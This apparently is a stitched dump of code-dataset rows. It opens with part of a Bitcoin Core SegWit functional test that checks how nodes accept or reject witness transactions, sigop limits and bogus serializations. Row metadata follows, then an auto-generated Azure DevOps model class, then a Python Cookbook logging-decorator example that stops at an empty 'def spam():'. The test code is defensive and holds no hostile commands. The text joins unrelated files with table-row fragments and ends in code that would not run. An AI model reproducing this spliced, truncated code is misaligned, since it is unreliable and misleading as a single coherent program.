test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 2: P2WSH
# Try to spend the P2WSH output created in last test.
# Send it to a P2SH(P2WSH) output, which we'll use in the next test.
script_p2sh = script_to_p2sh_script(script_wsh)
script_sig = CScript([script_wsh])
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, script_p2sh))
tx3.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx3, 0, SIGHASH_ALL, tx2.vout[0].nValue, key)
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
# But passes consensus.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx3])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 3: P2SH(P2WSH)
# Try to spend the P2SH output created in the last test.
# Send it to a P2PKH output, which we'll use in the next test.
script_pubkey = keyhash_to_p2pkh_script(pubkeyhash)
tx4 = CTransaction()
tx4.vin.append(CTxIn(COutPoint(tx3.sha256, 0), script_sig))
tx4.vout.append(CTxOut(tx3.vout[0].nValue - 1000, script_pubkey))
tx4.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx4, 0, SIGHASH_ALL, tx3.vout[0].nValue, key)
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx4, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx4])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 4: Uncompressed pubkeys should still be valid in non-segwit
# transactions.
tx5 = CTransaction()
tx5.vin.append(CTxIn(COutPoint(tx4.sha256, 0), b""))
tx5.vout.append(CTxOut(tx4.vout[0].nValue - 1000, CScript([OP_TRUE])))
(sig_hash, err) = LegacySignatureHash(script_pubkey, tx5, 0, SIGHASH_ALL)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
tx5.vin[0].scriptSig = CScript([signature, pubkey])
tx5.rehash()
# Should pass policy and consensus.
test_transaction_acceptance(self.nodes[0], self.test_node, tx5, True, True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx5])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.append(UTXO(tx5.sha256, 0, tx5.vout[0].nValue))
@subtest # type: ignore
def test_signature_version_1(self):
key = ECKey()
key.generate()
pubkey = key.get_pubkey().get_bytes()
witness_program = CScript([pubkey, CScriptOp(OP_CHECKSIG)])
script_pubkey = script_to_p2wsh_script(witness_program)
# First create a witness output for use in the tests.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=True)
# Mine this transaction in preparation for following tests.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.sync_blocks()
self.utxo.pop(0)
# Test each hashtype
prev_utxo = UTXO(tx.sha256, 0, tx.vout[0].nValue)
for sigflag in [0, SIGHASH_ANYONECANPAY]:
for hashtype in [SIGHASH_ALL, SIGHASH_NONE, SIGHASH_SINGLE]:
hashtype |= sigflag
block = self.build_next_block()
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(prev_utxo.sha256, prev_utxo.n), b""))
tx.vout.append(CTxOut(prev_utxo.nValue - 1000, script_pubkey))
tx.wit.vtxinwit.append(CTxInWitness())
# Too-large input value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue + 1, key)
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Too-small input value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue - 1, key)
block.vtx.pop() # remove last tx
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now try correct value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue, key)
block.vtx.pop()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
prev_utxo = UTXO(tx.sha256, 0, tx.vout[0].nValue)
# Test combinations of signature hashes.
# Split the utxo into a lot of outputs.
# Randomly choose up to 10 to spend, sign with different hashtypes, and
# output to a random number of outputs. Repeat NUM_SIGHASH_TESTS times.
# Ensure that we've tested a situation where we use SIGHASH_SINGLE with
# an input index > number of outputs.
NUM_SIGHASH_TESTS = 500
temp_utxos = []
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(prev_utxo.sha256, prev_utxo.n), b""))
split_value = prev_utxo.nValue // NUM_SIGHASH_TESTS
for _ in range(NUM_SIGHASH_TESTS):
tx.vout.append(CTxOut(split_value, script_pubkey))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, 0, SIGHASH_ALL, prev_utxo.nValue, key)
for i in range(NUM_SIGHASH_TESTS):
temp_utxos.append(UTXO(tx.sha256, i, split_value))
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
block = self.build_next_block()
used_sighash_single_out_of_bounds = False
for i in range(NUM_SIGHASH_TESTS):
# Ping regularly to keep the connection alive
if (not i % 100):
self.test_node.sync_with_ping()
# Choose random number of inputs to use.
num_inputs = random.randint(1, 10)
# Create a slight bias for producing more utxos
num_outputs = random.randint(1, 11)
random.shuffle(temp_utxos)
assert len(temp_utxos) > num_inputs
tx = CTransaction()
total_value = 0
for i in range(num_inputs):
tx.vin.append(CTxIn(COutPoint(temp_utxos[i].sha256, temp_utxos[i].n), b""))
tx.wit.vtxinwit.append(CTxInWitness())
total_value += temp_utxos[i].nValue
split_value = total_value // num_outputs
for _ in range(num_outputs):
tx.vout.append(CTxOut(split_value, script_pubkey))
for i in range(num_inputs):
# Now try to sign each input, using a random hashtype.
anyonecanpay = 0
if random.randint(0, 1):
anyonecanpay = SIGHASH_ANYONECANPAY
hashtype = random.randint(1, 3) | anyonecanpay
sign_p2pk_witness_input(witness_program, tx, i, hashtype, temp_utxos[i].nValue, key)
if (hashtype == SIGHASH_SINGLE and i >= num_outputs):
used_sighash_single_out_of_bounds = True
tx.rehash()
for i in range(num_outputs):
temp_utxos.append(UTXO(tx.sha256, i, split_value))
temp_utxos = temp_utxos[num_inputs:]
block.vtx.append(tx)
# Test the block periodically, if we're close to maxblocksize
if (get_virtual_size(block) > MAX_BLOCK_BASE_SIZE - 1000):
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
block = self.build_next_block()
if (not used_sighash_single_out_of_bounds):
self.log.info("WARNING: this test run didn't attempt SIGHASH_SINGLE with out-of-bounds index value")
# Test the transactions we've added to the block
if (len(block.vtx) > 1):
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now test witness version 0 P2PKH transactions
pubkeyhash = hash160(pubkey)
script_pkh = key_to_p2wpkh_script(pubkey)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(temp_utxos[0].sha256, temp_utxos[0].n), b""))
tx.vout.append(CTxOut(temp_utxos[0].nValue, script_pkh))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, 0, SIGHASH_ALL, temp_utxos[0].nValue, key)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue, CScript([OP_TRUE])))
script = keyhash_to_p2pkh_script(pubkeyhash)
sig_hash = SegwitV0SignatureHash(script, tx2, 0, SIGHASH_ALL, tx.vout[0].nValue)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
# Check that we can't have a scriptSig
tx2.vin[0].scriptSig = CScript([signature, pubkey])
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Move the signature to the witness.
block.vtx.pop()
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [signature, pubkey]
tx2.vin[0].scriptSig = b""
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
temp_utxos.pop(0)
# Update self.utxos for later tests by creating two outputs
# that consolidate all the coins in temp_utxos.
output_value = sum(i.nValue for i in temp_utxos) // 2
tx = CTransaction()
index = 0
# Just spend to our usual anyone-can-spend output
tx.vout = [CTxOut(output_value, CScript([OP_TRUE]))] * 2
for i in temp_utxos:
# Use SIGHASH_ALL|SIGHASH_ANYONECANPAY so we can build up
# the signatures as we go.
tx.vin.append(CTxIn(COutPoint(i.sha256, i.n), b""))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, index, SIGHASH_ALL | SIGHASH_ANYONECANPAY, i.nValue, key)
index += 1
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
for i in range(len(tx.vout)):
self.utxo.append(UTXO(tx.sha256, i, tx.vout[i].nValue))
@subtest # type: ignore
def test_non_standard_witness_blinding(self):
"""Test behavior of unnecessary witnesses in transactions does not blind the node for the transaction"""
# Create a p2sh output -- this is so we can pass the standardness
# rules (an anyone-can-spend OP_TRUE would be rejected, if not wrapped
# in P2SH).
p2sh_program = CScript([OP_TRUE])
script_pubkey = script_to_p2sh_script(p2sh_program)
# Now check that unnecessary witnesses can't be used to blind a node
# to a transaction, eg by violating standardness checks.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx, False, True)
self.nodes[0].generate(1)
self.sync_blocks()
# We'll add an unnecessary witness to this transaction that would cause
# it to be non-standard, to test that violating policy with a witness
# doesn't blind a node to a transaction. Transactions
# rejected for having a witness shouldn't be added
# to the rejection cache.
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), CScript([p2sh_program])))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a' * 400]
tx2.rehash()
# This will be rejected due to a policy check:
# No witness is allowed, since it is not a witness program but a p2sh program
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, True, False, 'bad-witness-nonstandard')
# If we send without witness, it should be accepted.
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, False, True)
# Now create a new anyone-can-spend utxo for the next test.
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), CScript([p2sh_program])))
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx3.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, False, True)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, False, True)
self.nodes[0].generate(1)
self.sync_blocks()
# Update our utxo list; we spent the first entry.
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_non_standard_witness(self):
"""Test detection of non-standard P2WSH witness"""
pad = chr(1).encode('latin-1')
# Create scripts for tests
scripts = []
scripts.append(CScript([OP_DROP] * 100))
scripts.append(CScript([OP_DROP] * 99))
scripts.append(CScript([pad * 59] * 59 + [OP_DROP] * 60))
scripts.append(CScript([pad * 59] * 59 + [OP_DROP] * 61))
p2wsh_scripts = []
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
# For each script, generate a pair of P2WSH and P2SH-P2WSH output.
outputvalue = (self.utxo[0].nValue - 1000) // (len(scripts) * 2)
for i in scripts:
p2wsh = script_to_p2wsh_script(i)
p2wsh_scripts.append(p2wsh)
tx.vout.append(CTxOut(outputvalue, p2wsh))
tx.vout.append(CTxOut(outputvalue, script_to_p2sh_script(p2wsh)))
tx.rehash()
txid = tx.sha256
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
# Creating transactions for tests
p2wsh_txs = []
p2sh_txs = []
for i in range(len(scripts)):
p2wsh_tx = CTransaction()
p2wsh_tx.vin.append(CTxIn(COutPoint(txid, i * 2)))
p2wsh_tx.vout.append(CTxOut(outputvalue - 5000, CScript([OP_0, hash160(b"")])))
p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2wsh_tx.rehash()
p2wsh_txs.append(p2wsh_tx)
p2sh_tx = CTransaction()
p2sh_tx.vin.append(CTxIn(COutPoint(txid, i * 2 + 1), CScript([p2wsh_scripts[i]])))
p2sh_tx.vout.append(CTxOut(outputvalue - 5000, CScript([OP_0, hash160(b"")])))
p2sh_tx.wit.vtxinwit.append(CTxInWitness())
p2sh_tx.rehash()
p2sh_txs.append(p2sh_tx)
# Testing native P2WSH
# Witness stack size, excluding witnessScript, over 100 is non-standard
p2wsh_txs[0].wit.vtxinwit[0].scriptWitness.stack = [pad] * 101 + [scripts[0]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[0], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[0], True, True)
# Stack element size over 80 bytes is non-standard
p2wsh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 81] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[1], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[1], True, True)
# Standard nodes should accept if element size is not over 80 bytes
p2wsh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 80] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[1], True, True)
# witnessScript size at 3600 bytes is standard
p2wsh_txs[2].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, scripts[2]]
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[2], True, True)
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[2], True, True)
# witnessScript size at 3601 bytes is non-standard
p2wsh_txs[3].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, pad, scripts[3]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[3], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[3], True, True)
# Repeating the same tests with P2SH-P2WSH
p2sh_txs[0].wit.vtxinwit[0].scriptWitness.stack = [pad] * 101 + [scripts[0]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[0], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[0], True, True)
p2sh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 81] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[1], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[1], True, True)
p2sh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 80] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[1], True, True)
p2sh_txs[2].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, scripts[2]]
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[2], True, True)
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[2], True, True)
p2sh_txs[3].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, pad, scripts[3]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[3], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[3], True, True)
self.nodes[0].generate(1) # Mine and clean up the mempool of non-standard node
# Valid but non-standard transactions in a block should be accepted by standard node
self.sync_blocks()
assert_equal(len(self.nodes[0].getrawmempool()), 0)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
self.utxo.pop(0)
@subtest # type: ignore
def test_upgrade_after_activation(self):
"""Test the behavior of starting up a segwit-aware node after the softfork has activated."""
# All nodes are caught up and node 2 is a pre-segwit node that will soon upgrade.
for n in range(2):
assert_equal(self.nodes[n].getblockcount(), self.nodes[2].getblockcount())
assert softfork_active(self.nodes[n], "segwit")
assert SEGWIT_HEIGHT < self.nodes[2].getblockcount()
assert 'segwit' not in self.nodes[2].getblockchaininfo()['softforks']
# Restarting node 2 should result in a shutdown because the blockchain consists of
# insufficiently validated blocks per segwit consensus rules.
self.stop_node(2)
self.nodes[2].assert_start_raises_init_error(
extra_args=[f"-segwitheight={SEGWIT_HEIGHT}"],
expected_msg=f": Witness data for blocks after height {SEGWIT_HEIGHT} requires validation. Please restart with -reindex..\nPlease restart with -reindex or -reindex-chainstate to recover.",
)
# As directed, the user restarts the node with -reindex
self.start_node(2, extra_args=["-reindex", f"-segwitheight={SEGWIT_HEIGHT}"])
# With the segwit consensus rules, the node is able to validate only up to SEGWIT_HEIGHT - 1
assert_equal(self.nodes[2].getblockcount(), SEGWIT_HEIGHT - 1)
self.connect_nodes(0, 2)
# We reconnect more than 100 blocks, give it plenty of time
# sync_blocks() also verifies the best block hash is the same for all nodes
self.sync_blocks(timeout=240)
# The upgraded node should now have segwit activated
assert softfork_active(self.nodes[2], "segwit")
@subtest # type: ignore
def test_witness_sigops(self):
"""Test sigop counting is correct inside witnesses."""
# Keep this under MAX_OPS_PER_SCRIPT (201)
witness_program = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKMULTISIG] * 5 + [OP_CHECKSIG] * 193 + [OP_ENDIF])
script_pubkey = script_to_p2wsh_script(witness_program)
sigops_per_script = 20 * 5 + 193 * 1
# We'll produce 2 extra outputs, one with a program that would take us
# over max sig ops, and one with a program that would exactly reach max
# sig ops
outputs = (MAX_SIGOP_COST // sigops_per_script) + 2
extra_sigops_available = MAX_SIGOP_COST % sigops_per_script
# We chose the number of checkmultisigs/checksigs to make this work:
assert extra_sigops_available < 100 # steer clear of MAX_OPS_PER_SCRIPT
# This script, when spent with the first
# N(=MAX_SIGOP_COST//sigops_per_script) outputs of our transaction,
# would push us just over the block sigop limit.
witness_program_toomany = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKSIG] * (extra_sigops_available + 1) + [OP_ENDIF])
script_pubkey_toomany = script_to_p2wsh_script(witness_program_toomany)
# If we spend this script instead, we would exactly reach our sigop
# limit (for witness sigops).
witness_program_justright = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKSIG] * (extra_sigops_available) + [OP_ENDIF])
script_pubkey_justright = script_to_p2wsh_script(witness_program_justright)
# First split our available utxo into a bunch of outputs
split_value = self.utxo[0].nValue // outputs
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
for _ in range(outputs):
tx.vout.append(CTxOut(split_value, script_pubkey))
tx.vout[-2].scriptPubKey = script_pubkey_toomany
tx.vout[-1].scriptPubKey = script_pubkey_justright
tx.rehash()
block_1 = self.build_next_block()
self.update_witness_block_with_transactions(block_1, [tx])
test_witness_block(self.nodes[0], self.test_node, block_1, accepted=True)
tx2 = CTransaction()
# If we try to spend the first n-1 outputs from tx, that should be
# too many sigops.
total_value = 0
for i in range(outputs - 1):
tx2.vin.append(CTxIn(COutPoint(tx.sha256, i), b""))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program]
total_value += tx.vout[i].nValue
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program_toomany]
tx2.vout.append(CTxOut(total_value, CScript([OP_TRUE])))
tx2.rehash()
block_2 = self.build_next_block()
self.update_witness_block_with_transactions(block_2, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_2, accepted=False)
# Try dropping the last input in tx2, and add an output that has
# too many sigops (contributing to legacy sigop count).
checksig_count = (extra_sigops_available // 4) + 1
script_pubkey_checksigs = CScript([OP_CHECKSIG] * checksig_count)
tx2.vout.append(CTxOut(0, script_pubkey_checksigs))
tx2.vin.pop()
tx2.wit.vtxinwit.pop()
tx2.vout[0].nValue -= tx.vout[-2].nValue
tx2.rehash()
block_3 = self.build_next_block()
self.update_witness_block_with_transactions(block_3, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=False)
# If we drop the last checksig in this output, the tx should succeed.
block_4 = self.build_next_block()
tx2.vout[-1].scriptPubKey = CScript([OP_CHECKSIG] * (checksig_count - 1))
tx2.rehash()
self.update_witness_block_with_transactions(block_4, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_4, accepted=True)
# Reset the tip back down for the next test
self.sync_blocks()
for x in self.nodes:
x.invalidateblock(block_4.hash)
# Try replacing the last input of tx2 to be spending the last
# output of tx
block_5 = self.build_next_block()
tx2.vout.pop()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, outputs - 1), b""))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program_justright]
tx2.rehash()
self.update_witness_block_with_transactions(block_5, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_5, accepted=True)
# TODO: test p2sh sigop counting
# Cleanup and prep for next test
self.utxo.pop(0)
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_superfluous_witness(self):
# Serialization of tx that puts witness flag to 3 always
def serialize_with_bogus_witness(tx):
flags = 3
r = b""
r += struct.pack("<i", tx.nVersion)
if flags:
dummy = []
r += ser_vector(dummy)
r += struct.pack("<B", flags)
r += ser_vector(tx.vin)
r += ser_vector(tx.vout)
if flags & 1:
if (len(tx.wit.vtxinwit) != len(tx.vin)):
# vtxinwit must have the same length as vin
tx.wit.vtxinwit = tx.wit.vtxinwit[:len(tx.vin)]
for _ in range(len(tx.wit.vtxinwit), len(tx.vin)):
tx.wit.vtxinwit.append(CTxInWitness())
r += tx.wit.serialize()
r += struct.pack("<I", tx.nLockTime)
return r
class msg_bogus_tx(msg_tx):
def serialize(self):
return serialize_with_bogus_witness(self.tx)
self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(address_type='bech32'), 5)
self.nodes[0].generate(1)
unspent = next(u for u in self.nodes[0].listunspent() if u['spendable'] and u['address'].startswith('bcrt'))
raw = self.nodes[0].createrawtransaction([{"txid": unspent['txid'], "vout": unspent['vout']}], {self.nodes[0].getnewaddress(): 1})
tx = tx_from_hex(raw)
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, hexstring=serialize_with_bogus_witness(tx).hex(), iswitness=True)
with self.nodes[0].assert_debug_log(['Superfluous witness record']):
self.test_node.send_and_ping(msg_bogus_tx(tx))
raw = self.nodes[0].signrawtransactionwithwallet(raw)
assert raw['complete']
raw = raw['hex']
tx = tx_from_hex(raw)
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, hexstring=serialize_with_bogus_witness(tx).hex(), iswitness=True)
with self.nodes[0].assert_debug_log(['Unknown transaction optional data']):
self.test_node.send_and_ping(msg_bogus_tx(tx))
@subtest # type: ignore
def test_wtxid_relay(self):
# Use brand new nodes to avoid contamination from earlier tests
self.wtx_node = self.nodes[0].add_p2p_connection(TestP2PConn(wtxidrelay=True), services=NODE_NETWORK | NODE_WITNESS)
self.tx_node = self.nodes[0].add_p2p_connection(TestP2PConn(wtxidrelay=False), services=NODE_NETWORK | NODE_WITNESS)
# Check wtxidrelay feature negotiation message through connecting a new peer
def received_wtxidrelay():
return (len(self.wtx_node.last_wtxidrelay) > 0)
self.wtx_node.wait_until(received_wtxidrelay)
# Create a Segwit output from the latest UTXO
# and announce it to the network
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
# Create a Segwit transaction
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
# Announce Segwit transaction with wtxid
# and wait for getdata
self.wtx_node.announce_tx_and_wait_for_getdata(tx2, use_wtxid=True)
with p2p_lock:
lgd = self.wtx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_WTX, tx2.calc_sha256(True))])
# Announce Segwit transaction from non wtxidrelay peer
# and wait for getdata
self.tx_node.announce_tx_and_wait_for_getdata(tx2, use_wtxid=False)
with p2p_lock:
lgd = self.tx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_TX|MSG_WITNESS_FLAG, tx2.sha256)])
# Send tx2 through; it's an orphan so won't be accepted
with p2p_lock:
self.wtx_node.last_message.pop("getdata", None)
test_transaction_acceptance(self.nodes[0], self.wtx_node, tx2, with_witness=True, accepted=False)
# Expect a request for parent (tx) by txid despite use of WTX peer
self.wtx_node.wait_for_getdata([tx.sha256], 60)
with p2p_lock:
lgd = self.wtx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_WITNESS_TX, tx.sha256)])
# Send tx through
test_transaction_acceptance(self.nodes[0], self.wtx_node, tx, with_witness=False, accepted=True)
# Check tx2 is there now
assert_equal(tx2.hash in self.nodes[0].getrawmempool(), True)
if __name__ == '__main__':
SegWitTest().main()
| [
"[email protected]"
] | |
10a74a89df0e005033f9a0040c90b46da278a520 | e71b6d14fbdbc57c7234ca45a47329d7d02fc6f7 | /flask_api/venv/lib/python3.7/site-packages/vsts/member_entitlement_management/v4_1/models/user_entitlement_operation_reference.py | 0e8a8c4903319844a6245687d671b999ccabee76 | [
"MIT"
] | permissive | u-blavins/secret_sasquatch_society | c36993c738ab29a6a4879bfbeb78a5803f4f2a57 | 0214eadcdfa9b40254e331a6617c50b422212f4c | refs/heads/master | 2020-08-14T00:39:52.948272 | 2020-01-22T13:54:58 | 2020-01-22T13:54:58 | 215,058,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .operation_reference import OperationReference
class UserEntitlementOperationReference(OperationReference):
"""UserEntitlementOperationReference.
:param id: Unique identifier for the operation.
:type id: str
:param plugin_id: Unique identifier for the plugin.
:type plugin_id: str
:param status: The current status of the operation.
:type status: object
:param url: URL to get the full operation object.
:type url: str
:param completed: Operation completed with success or failure.
:type completed: bool
:param have_results_succeeded: True if all operations were successful.
:type have_results_succeeded: bool
:param results: List of results for each operation.
:type results: list of :class:`UserEntitlementOperationResult <member-entitlement-management.v4_1.models.UserEntitlementOperationResult>`
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'plugin_id': {'key': 'pluginId', 'type': 'str'},
'status': {'key': 'status', 'type': 'object'},
'url': {'key': 'url', 'type': 'str'},
'completed': {'key': 'completed', 'type': 'bool'},
'have_results_succeeded': {'key': 'haveResultsSucceeded', 'type': 'bool'},
'results': {'key': 'results', 'type': '[UserEntitlementOperationResult]'}
}
def __init__(self, id=None, plugin_id=None, status=None, url=None, completed=None, have_results_succeeded=None, results=None):
super(UserEntitlementOperationReference, self).__init__(id=id, plugin_id=plugin_id, status=status, url=url)
self.completed = completed
self.have_results_succeeded = have_results_succeeded
self.results = results
| [
"[email protected]"
] | |
225b6d5941ba617b3affab3562256f853598178b | c15a28ae62eb94dbf3ed13e2065195e572a9988e | /Cook book/src/9/defining_a_decorator_with_user_adjustable_attributes/example2.py | 36d1bb206aabac56e5e7fba7acecdad70229e638 | [] | no_license | xuyuchends1/python | 10798c92840a1a59d50f5dc5738b2881e65f7865 | 545d950a3d2fee799902658e8133e3692939496b | refs/heads/master | 2021-01-25T07:07:04.812140 | 2020-02-28T09:25:15 | 2020-02-28T09:25:15 | 93,647,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,305 | py | # Alternate formulation using function attributes directly
from functools import wraps
import logging
def logged(level, name=None, message=None):
'''
Add logging to a function. level is the logging
level, name is the logger name, and message is the
log message. If name and message aren't specified,
they default to the function's module and name.
'''
def decorate(func):
logname = name if name else func.__module__
log = logging.getLogger(logname)
logmsg = message if message else func.__name__
@wraps(func)
def wrapper(*args, **kwargs):
wrapper.log.log(wrapper.level, wrapper.logmsg)
return func(*args, **kwargs)
# Attach adjustable attributes
wrapper.level = level
wrapper.logmsg = logmsg
wrapper.log = log
return wrapper
return decorate
# Example use
@logged(logging.DEBUG)
def add(x, y):
return x + y
@logged(logging.CRITICAL, 'example')
def spam():
